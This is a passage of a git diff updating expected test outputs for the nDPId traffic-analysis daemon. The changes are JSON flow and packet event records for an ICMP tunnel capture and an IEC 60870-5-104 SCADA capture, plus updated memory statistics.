-00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":569,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":490,"flow_first_seen":1360227866459,"flow_last_seen":1360228816210,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":70088,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1360228816210,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":801,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":708,"flow_first_seen":1360227866459,"flow_last_seen":1360228942891,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":98648,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1360228942891,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00785{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":961,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":863,"flow_first_seen":1360227866459,"flow_last_seen":1360228988973,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":161468,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1360228988973,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":400,"flow_first_seen":1360227866459,"flow_last_seen":1360228543914,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":59886,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1360228543914,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":525,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":460,"flow_first_seen":1360227866459,"flow_last_seen":1360228682488,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":67252,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1360228682488,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":569,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":490,"flow_first_seen":1360227866459,"flow_last_seen":1360228816210,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":70088,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1360228816210,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":801,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":708,"flow_first_seen":1360227866459,"flow_last_seen":1360228942891,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":98648,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1360228942891,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00785{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":961,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":863,"flow_first_seen":1360227866459,"flow_last_seen":1360228988973,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":161468,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1360228988973,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":961,"source":"icmp-tunnel.pcap","alias":"nDPId-test","packets-captured":961,"packets-processed":863,"total-skipped-flows":0,"total-l4-payload-len":161468,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":8,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1360228988973} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 961/863 @@ -24,9 +24,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5894470 bytes -~~ total memory freed........: 5894470 bytes -~~ total allocations/frees...: 118977/118977 +~~ total memory allocated....: 6028104 bytes +~~ total memory freed........: 6028104 bytes +~~ total allocations/frees...: 121739/121739 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 791 chars diff --git a/test/results/iec60780-5-104.pcap.out b/test/results/iec60780-5-104.pcap.out index e8c4a5875..0140bea13 100644 --- a/test/results/iec60780-5-104.pcap.out +++ b/test/results/iec60780-5-104.pcap.out @@ -4,39 +4,39 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1219992231267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAwbS5AAIAGRKWsG\/htrBv4TwYgCWR6t61JAAAAAHAC\/\/8CpgAAAgQFtAEBBAI="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1219992231267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABNy14eKABXFGNTMCABFAAAwQVVAAIAGcH6sG\/hPrBv4bQlkBiDrZdPBeretSnAS\/\/9DbQAAAgQFtAEBBAI="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1219992231267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAobS9AAIAGRKysG\/htrBv4TwYgCWR6t61K62XTwlAQ\/\/9wMQAAAAAAAAAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992393215,"flow_last_seen":1219992393215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992393215,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1219992393215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABXFGNTMABNy14eKCABFAAAwbYNAAIAGRFCsG\/htrBv4TwYiCWRtLtqlAAAAAHAC\/\/\/i0AAAAgQFtAEBBAI="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1219992393215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABNy14eKABXFGNTMCABFAAAwQXdAAIAGcFysG\/hPrBv4bQlkBiJI3nuobS7apnAS\/\/8eOQAAAgQFtAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1219992393216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992393216,"pkt":"ABXFGNTMABNy14eKCABFAAAobYRAAIAGRFesG\/htrBv4TwYiCWRtLtqmSN57qVAQ\/\/9K\/QAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992486295,"flow_last_seen":1219992486295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992486295,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1219992486295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486295,"pkt":"ABXFGNTMABNy14eKCABFAAAwbaNAAIAGRDCsG\/htrBv4TwYjCWQlpaXOAAAAAHAC\/\/9fMAAAAgQFtAEBBAI="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1219992486296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486296,"pkt":"ABNy14eKABXFGNTMCABFAAAwQX5AAIAGcFWsG\/hPrBv4bQlkBiP13h8HJaWlz3AS\/\/9KOQAAAgQFtAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1219992486296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992486296,"pkt":"ABXFGNTMABNy14eKCABFAAAobaRAAIAGRDesG\/htrBv4TwYjCWQlpaXP9d4fCFAQ\/\/92\/QAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992546983,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992546983,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992590188,"flow_last_seen":1219992590188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992590188,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1219992590188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAwbcVAAIAGRA6sG\/htrBv4TwYkCWQxVG2fAAAAAHAC\/\/+LrwAAAgQFtAEBBAI="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1219992590188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABNy14eKABXFGNTMCABFAAAwQYVAAIAGcE6sG\/hPrBv4bQlkBiSd+ybXMVRtoHAS\/\/\/GywAAAgQFtAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1219992590188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAobcZAAIAGRBWsG\/htrBv4TwYkCWQxVG2gnfsm2FAQ\/\/\/zjwAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":73,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992650548,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992710502,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":73,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992650548,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992710502,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992782348,"flow_last_seen":1219992782348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992782348,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1219992782348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABXFGNTMABNy14eKCABFAAAwbjdAAIAGQ5ysG\/htrBv4TwYpCWQN1WRMAAAAAHAC\/\/+4fAAAAgQFtAEBBAI="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1219992782348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZFAAIAGcEKsG\/hPrBv4bQlkBikE5Jl8DdVkTXAS\/\/8aCwAAAgQFtAEBBAI="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1219992782349,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992782349,"pkt":"ABXFGNTMABNy14eKCABFAAAobjhAAIAGQ6OsG\/htrBv4TwYpCWQN1WRNBOSZfVAQ\/\/9GzwAAAAAAAAAA"} 